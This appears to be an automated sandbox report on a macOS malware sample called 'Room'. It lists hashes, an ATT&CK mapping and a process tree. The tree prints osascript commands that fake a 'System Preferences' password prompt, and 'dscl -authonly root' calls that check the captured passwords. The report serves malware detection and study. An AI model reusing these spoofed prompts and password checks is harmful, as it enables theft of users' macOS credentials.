b96f3b1f152ec56b9b9eaab1283d0520a480a9b4c812eae87a4278f1d1b10c72

General

Target

Room
Size

545KB
MD5

bb90f8cd1a127d6a7d7d4d4ff1058725
SHA1

25a30c1cac56bfdb5101271069591afd2225d341
SHA256

b96f3b1f152ec56b9b9eaab1283d0520a480a9b4c812eae87a4278f1d1b10c72
SHA512

8e02b775ec14d735c05676e7b550238ebfa6b4f3d64a5ffb4cef8912dd519cfed43f950515a0853107e157d8419fb4027e85387093ed982adb15e35ceaa2e15c
SSDEEP

6144:gm4KdfzNpIVbReMOQ8HLTWFVkyMGDCy8rcEYxgVKBjDhXBMqBIUN:jrKbRkHHLTKVkGvEQSSRMq

Score

4^/10

execution

Malware Config

Signatures

AppleScript 1 TTPs 14 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Room\""
1⤵
PID:476

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Room\""
1⤵
PID:476

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Room
1⤵
PID:476
- /bin/zsh
  /bin/zsh -c /Users/run/Room
  2⤵
  PID:478
- /Users/run/Room
  /Users/run/Room
  2⤵
  PID:478

/bin/sh
sh -c "mkdir /Users/root/2137596641"
1⤵
PID:479

/bin/bash
sh -c "mkdir /Users/root/2137596641"
1⤵
PID:479

/bin/mkdir
mkdir /Users/root/2137596641
1⤵
PID:479

/bin/sh
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:480

/bin/bash
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:480

/usr/bin/dscl
dscl /Local/Default -authonly root
1⤵
PID:480

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:481

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:481

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:481

/usr/sbin/kextcache
/usr/sbin/kextcache -F -system-prelinked-kernel
1⤵
PID:485

/bin/sh
sh -c "dscl /Local/Default -authonly root infectwed"
1⤵
PID:515

/bin/bash
sh -c "dscl /Local/Default -authonly root infectwed"
1⤵
PID:515

/usr/bin/dscl
dscl /Local/Default -authonly root infectwed
1⤵
PID:515

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:516

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:516

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:516

/bin/sh
sh -c "dscl /Local/Default -authonly root infected"
1⤵
PID:517

/bin/bash
sh -c "dscl /Local/Default -authonly root infected"
1⤵
PID:517

/usr/bin/dscl
dscl /Local/Default -authonly root infected
1⤵
PID:517

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:518

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:518

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:518

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:519

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:519

/bin/sh
sh -c "dscl /Local/Default -authonly root malware"
1⤵
PID:526

/bin/bash
sh -c "dscl /Local/Default -authonly root malware"
1⤵
PID:526

/usr/bin/dscl
dscl /Local/Default -authonly root malware
1⤵
PID:526

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:527

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:527

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:527

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:534

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:534

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:534

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:542

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:542

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:542

/bin/sh
sh -c "dscl /Local/Default -authonly root password"
1⤵
PID:543

/bin/bash
sh -c "dscl /Local/Default -authonly root password"
1⤵
PID:543

/usr/bin/dscl
dscl /Local/Default -authonly root password
1⤵
PID:543

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:544

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:544

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

AppleScript

1

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
d00e9535219cf454c7e39d87311a4c9a

SHA1
8b59f353d7025593f5319adfdafe95ad3edb8c71

SHA256
c60a7533e9f41fc9759a7bf082292a2713eeb3056bcf55ffd3c80afbf365ef4f

SHA512
72e526118b9c674702ddb674425d1945914f63c143de37e16f713d918c78c479d8f8a0a25bfbe66058fe6c36e14d1d028704038ed8fc489542c52d38856837ac

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
82fbf954c27d2bed80699882d9dc333d

SHA1
0e650c6f6bda6625a60939688cf332b8356da9ef

SHA256
b250d3f831e5f0f150979250bfa1bb39df08542d34a82098665965437bda8f64

SHA512
f5318ee8decf905e4e0435db9debf9be1fb0c8db298c9d5ab6a103c306a5046d1e91f1513876bda96832d82d37395697cb8e566516821381b27cfc06235d93f9

Download Submit

Analysis

Sharing